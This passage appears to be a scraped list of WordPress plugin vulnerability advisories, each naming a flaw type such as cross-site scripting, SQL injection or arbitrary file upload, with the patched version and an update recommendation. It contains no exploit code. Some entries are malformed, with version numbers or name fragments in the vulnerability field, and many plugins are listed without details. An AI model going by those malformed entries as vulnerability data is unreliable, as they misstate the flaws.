Vulnerability: Cross-Site Request Forgery via ‘statusBulkEdit’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Retain Live Chat

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Admin+ Malicious File Upload
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: M Chart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Mollie Payments for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: 7.3.12
Recommended Action: Update to version 7.3.12, or a newer patched version

Plugin: Admin Block Country

Vulnerability: Cross-Site Request Forgery via admin_block_country_initial_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any Theme – My Sticky Bar (formerly myStickymenu)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Psychological tests & quizzes

Plugin: AdSense-Deluxe

Plugin: Send Users Email – Email Subscribers, Email Marketing Newsletter

Vulnerability: Sensitive Information Exposure via Error Logs
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Contact Form 7 Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: 1.1.1
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Piwik PRO

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.4
Recommended Action: Update to version 0.4.4, or a newer patched version

Plugin: Interactive Image Map Plugin – Draw Attention

Vulnerability: Improper Access Control via register_cpt
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Stored Cross-Site Scripting via $custom_profile
Patched Version: 4.1.3.2
Recommended Action: Update to version 4.1.3.2, or a newer patched version

Plugin: Stock market charts from finviz

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: 404 SEO Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Core: WordPress

Vulnerability: HTML File Upload
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: smart-slider-2

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Tracked Tweets

Plugin: Alert Before Your Post

Plugin: BuddyPress

Vulnerability: 7.0.0
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: 5.8.4
Recommended Action: Update to version 5.8.4, or a newer patched version

Plugin: WonderPlugin Audio Player

Vulnerability: Blind SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Advanced Youtube Channel Pagination

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cloud Manager

Plugin: ND Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Arbitrary Directory Deletion via Path Traversal
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Testimonials

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: WordPress Ecommerce < 1.5.4
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Cart2Cart: Magento to WooCommerce Migration

Vulnerability: Missing Authorization via setToken
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Testimonial Slider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Advanced Menu Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Arbitrary File Read via Shortcode
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Title Overwrite
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Missing Authorization
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Sync QCloud COS

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Forms by CaptainForm – Form Builder for WordPress

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated (Subscriber+) SQL Injection via id
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Highlight Searched Terms in Results

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: WikiPop

Plugin: Social Slider

Vulnerability: SQL Injection
Patched Version: 7.4.2
Recommended Action: Update to version 7.4.2, or a newer patched version

Plugin: 10WebAnalytics

Vulnerability: Missing Authorization via gawd_wd_bp_install_notice_status
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GC Testimonials

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 0.9.76
Recommended Action: Update to version 0.9.76, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Video Link
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Child Theme Generator

Plugin: DecaLog

Vulnerability: Cross-Site Request Forgery via get_settings_page
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Reflected Cross-Site Scripting via redirect-page Parameter
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: digg-digg

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.5
Recommended Action: Update to version 5.3.5, or a newer patched version

Plugin: Visitors Online by BestWebSoft

Vulnerability: SQL Injection
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization to Settings Update
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Missing Authorization via stm_wpcfto_get_settings_callback
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Authorization Bypass via IP Spoofing
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Fast Secure Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.38
Recommended Action: Update to version 4.0.38, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via Multiple Parameters
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Captcha Them All

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Property Hive

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: WP Affiliate Disclosure

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via $id
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via IP
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Remote Code Execution
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Video Metabox

Vulnerability: Stored Cross Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.63
Recommended Action: Update to version 1.1.63, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.22
Recommended Action: Update to version 1.6.22, or a newer patched version

Plugin: Unify

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Simply Excerpts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated Authorization Bypass and Privilege Escalation
Patched Version: 6.6.2
Recommended Action: Update to version 6.6.2, or a newer patched version

Plugin: ShopConstruct – Product Catalog, Shopping Cart and eCommerce solution for Store

Vulnerability: Reflected Cross-Site Scripting via multiple parameters
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthorized Image File Upload
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.42
Recommended Action: Update to version 1.2.42, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: StreamCast – Radio Player for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: EU Cookie Law for GDPR/CCPA

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Masteriyo LMS – eLearning and Online Course Builder for WordPress

Vulnerability: LMS for WordPress <= 1.6.7
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Sniplets

Vulnerability: Remote File Inclusion
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Enhanced WP Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WordPress GDPR

Vulnerability: No subtitle
Patched Version: 1.9.27
Recommended Action: Update to version 1.9.27, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site-Scripting
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Quards

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: SQL Injection
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.6.2
Recommended Action: Update to version 1.2.6.2, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: SQL Injection via Translations
Patched Version: 6.3.6
Recommended Action: Update to version 6.3.6, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: PHP Object Injection
Patched Version: 5.7.12
Recommended Action: Update to version 5.7.12, or a newer patched version

Plugin: Számlázz.hu integráció WooCommerce-hez

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.3.3
Recommended Action: Update to version 5.6.3.3, or a newer patched version

Plugin: Temporary Login Without Password

Vulnerability: Subscriber+ Plugin Settings Update
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: No subtitle
Patched Version: 3.0.39
Recommended Action: Update to version 3.0.39, or a newer patched version

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Cross Site Request Forgery via bulk_delete
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Comments Extra Fields For Post,Pages and CPT

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: PixelYourSite Pro – Your smart PIXEL (TAG) Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 9.6.2
Recommended Action: Update to version 9.6.2, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: CAOS | Host Google Analytics Locally

Vulnerability: Missing Authorization to Unauthenticated Plugin Settings Update
Patched Version: 4.7.15
Recommended Action: Update to version 4.7.15, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.20.20
Recommended Action: Update to version 1.20.20, or a newer patched version

Plugin: Easy Author Image

Vulnerability: Email Information Exposure
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Post Indexer

Vulnerability: Authenticated (Super Admin+) SQL Injection
Patched Version: 3.0.6.2
Recommended Action: Update to version 3.0.6.2, or a newer patched version

Plugin: Efí Bank

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WooCommerce Builder & Gutenberg WooCommerce Blocks – WowStore

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Custom Simple Rss

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: WP Backup Manager

Plugin: Podcast Importer SecondLine

Vulnerability: Server-Side Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: ImageRecycle pdf & image compression

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: WP Donate

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WP Shop

Vulnerability: Missing Authentication to Settings Change and Order Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart Online Order for Clover

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Website Monetization by MageNet

Vulnerability: Cross-Site Request Forgery via admin_magenet_settings
Patched Version: 1.0.29.2
Recommended Action: Update to version 1.0.29.2, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 4.11
Recommended Action: Update to version 4.11, or a newer patched version

Plugin: Admin Custom Login

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: WP Maintenance

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Advanced Dewplayer

Vulnerability: Directory Traversal
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Protection Bypass due to IP Spoofing
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Monetize

Plugin: Easy Appointments

Vulnerability: Cross-Site Scripting
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Under Construction, Coming Soon & Maintenance Mode

Vulnerability: Server Side Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: File Away

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Email Subscription Popup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.19
Recommended Action: Update to version 1.2.19, or a newer patched version

Plugin: spam-byebye

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: WooCommerce Help Scout

Vulnerability: Arbitrary File Upload to Remote Code Execution
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Access Demo Importer

Vulnerability: Cross-Site Request Forgery to Data Reset
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Media from FTP

Vulnerability: Improper Privilege Management
Patched Version: 11.16
Recommended Action: Update to version 11.16, or a newer patched version

Plugin: Autoptimize

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Settings Delete via admin_post_remove and remove_private_data
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: NOO Timetable

Plugin: Church Admin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2550
Recommended Action: Update to version 1.2550, or a newer patched version

Plugin: OneTone Companion

Vulnerability: Open Mailer
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary Usermeta Update to Authenticated (Author+) Privilege Escalation
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: FloLaunch

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Subscriptions & Memberships for PayPal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Core Web Vitals & PageSpeed Booster

Vulnerability: Open Redirect via _wp_http_referer
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: WP Post Popup

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: ElementsKit Elementor addons

Vulnerability: Missing Authorization
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WP-Picasa-Image

Plugin: WP Docs

Vulnerability: Cross-Site Request Forgery to folder management
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Coupon Referral Program

Plugin: Digital Goods for WooCommerce Checkout

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: WooCommerce Ninja Forms Product Add-ons

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Donations

Plugin: ShiftThis

Plugin: Comments by Startbit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Clean and Simple

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.7.1
Recommended Action: Update to version 4.7.1, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.2.6
Recommended Action: Update to version 9.2.6, or a newer patched version

Plugin: Two Factor Authentication (2FA , MFA, OTP SMS and Email)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Finale Lite – Sales Countdown Timer & Discount for WooCommerce

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Kiwiz – Certification de facturation – Woocommerce

Vulnerability: Certification de facturation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Log

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Easy PayPal Shopping Cart

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Header Footer Code Manager

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 1.1.35
Recommended Action: Update to version 1.1.35, or a newer patched version

Plugin: WordPress Header Builder Plugin – Pearl

Vulnerability: Cross-Site Request Forgery via stm_save_hb_settings
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Bulk Resize Media

Vulnerability: Cross-Site Request Forgery via bulk_resize_resize_image
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2022.6
Recommended Action: Update to version 2022.6, or a newer patched version

Plugin: WP-Table Reloaded

Plugin: Booster Elite for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Cybersoldier

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Server-Side Request Forgery
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Image Slider

Vulnerability: SQL Injection
Patched Version: 1.1.97
Recommended Action: Update to version 1.1.97, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Arbitrary File Upload
Patched Version: 1.7.33
Recommended Action: Update to version 1.7.33, or a newer patched version

Plugin: PowerPack Elementor Addons (Free Widgets, Extensions and Templates)

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload PRO – Contact Form 7 Standard

Vulnerability: Contact Form 7 Standard <= 5.0.6.3 and <= 2.11.0
Patched Version: 2.11.1
Recommended Action: Update to one of the following versions, or a newer patched version: 2.11.1, 5.0.6.4

Plugin: WPBakery Page Builder Addons by Livemesh

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: FlightLog

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hermit 音乐播放器

Plugin: Add to Calendar Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Amelia < 1.0.47
Patched Version: 1.0.47
Recommended Action: Update to version 1.0.47, or a newer patched version

Plugin: DoFollow Case by Case

Vulnerability: No subtitle
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: AN_GradeBook

Plugin: BSK PDF Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
